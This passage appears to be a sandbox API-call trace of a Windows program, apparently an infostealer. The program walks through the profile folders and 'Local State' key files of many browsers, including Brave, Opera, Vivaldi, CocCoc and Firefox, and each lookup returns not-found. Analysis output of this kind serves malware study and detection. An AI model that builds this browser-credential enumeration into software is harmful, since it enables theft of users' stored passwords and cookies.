GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\vivaldi\\user data\\local state")) returned 0xffffffff [0207.115] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\*") returned 55 [0207.116] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x740061, ftCreationTime.dwLowDateTime=0x65, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.162] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.163] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CocCoc\\Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data" [0207.163] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data" [0207.163] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Local State" [0207.163] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coccoc\\browser\\user data\\local state")) returned 0xffffffff [0207.163] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\*") returned 62 [0207.163] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.164] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.164] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\uCozMedia\\Uran\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data" [0207.164] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data" [0207.164] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Local State" [0207.165] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\ucozmedia\\uran\\user data\\local state")) returned 0xffffffff [0207.165] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*") returned 62 [0207.165] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.165] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.166] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\QIP Surf\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data" [0207.166] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data" [0207.166] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\Local State" [0207.166] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\qip surf\\user data\\local state")) returned 0xffffffff [0207.166] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\*") returned 56 [0207.166] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x610074, ftCreationTime.dwLowDateTime=0x650074, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.167] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.167] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CentBrowser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data" [0207.167] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data" [0207.167] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\Local State" [0207.167] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\centbrowser\\user data\\local state")) returned 0xffffffff [0207.167] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\*") returned 59 [0207.167] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x20006c, ftCreationTime.dwLowDateTime=0x740053, ftCreationTime.dwHighDateTime=0x740061, ftLastAccessTime.dwLowDateTime=0x65, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.168] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.168] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Elements Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data" [0207.168] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data" [0207.169] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\Local State" [0207.169] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\elements browser\\user data\\local state")) returned 0xffffffff [0207.169] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\*") returned 64 [0207.169] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.170] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.170] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\TorBro\\Profile" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile" [0207.170] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile" [0207.170] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\Local State" [0207.170] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torbro\\profile\\local state")) returned 0xffffffff [0207.170] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\*") returned 52 [0207.170] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.171] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.171] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CryptoTab Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data" [0207.171] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data" [0207.171] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\Local State" [0207.171] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\cryptotab browser\\user data\\local state")) returned 0xffffffff [0207.171] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\*") returned 65 [0207.172] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x5c0061, ftCreationTime.dwLowDateTime=0x6f004c, ftCreationTime.dwHighDateTime=0x610063, ftLastAccessTime.dwLowDateTime=0x20006c, ftLastAccessTime.dwHighDateTime=0x740053, ftLastWriteTime.dwLowDateTime=0x740061, ftLastWriteTime.dwHighDateTime=0x65, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.173] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.173] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\BraveSoftware\\Brave-Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" [0207.173] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" [0207.173] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State" [0207.173] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\bravesoftware\\brave-browser\\user data\\local state")) returned 0xffffffff [0207.173] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*") returned 75 [0207.173] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x5c0072, ftCreationTime.dwLowDateTime=0x730055, ftCreationTime.dwHighDateTime=0x720065, ftLastAccessTime.dwLowDateTime=0x440020, ftLastAccessTime.dwHighDateTime=0x740061, ftLastWriteTime.dwLowDateTime=0x5c0061, ftLastWriteTime.dwHighDateTime=0x6f004c, nFileSizeHigh=0x610063, nFileSizeLow=0x20006c, dwReserved0=0x740053, dwReserved1=0x740061, cFileName="e", cAlternateFileName="")) returned 0xffffffff [0207.174] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.175] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Opera Software\\Opera Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" [0207.175] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" [0207.176] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State" [0207.176] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera stable\\local state")) returned 0xffffffff [0207.176] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\*") returned 68 [0207.176] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x6c0062, ftCreationTime.dwLowDateTime=0x5c0065, ftCreationTime.dwHighDateTime=0x6f004c, ftLastAccessTime.dwLowDateTime=0x610063, ftLastAccessTime.dwHighDateTime=0x20006c, ftLastWriteTime.dwLowDateTime=0x740053, ftLastWriteTime.dwHighDateTime=0x740061, nFileSizeHigh=0x65, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.176] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.176] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Opera Software\\Opera GX Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" [0207.176] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" [0207.177] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State" [0207.177] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera gx stable\\local state")) returned 0xffffffff [0207.177] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\*") returned 71 [0207.177] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x740053, ftCreationTime.dwLowDateTime=0x620061, ftCreationTime.dwHighDateTime=0x65006c, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.177] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.177] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Opera Software\\Opera Neon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data" [0207.177] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data" [0207.177] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\Local State" [0207.177] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\opera software\\opera neon\\user data\\local state")) returned 0xffffffff [0207.177] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\*") returned 73 [0207.177] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.178] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d41c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.179] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0207.179] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0207.179] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini" [0207.179] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\firefox\\profiles.ini")) returned 0xffffffff [0207.179] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, 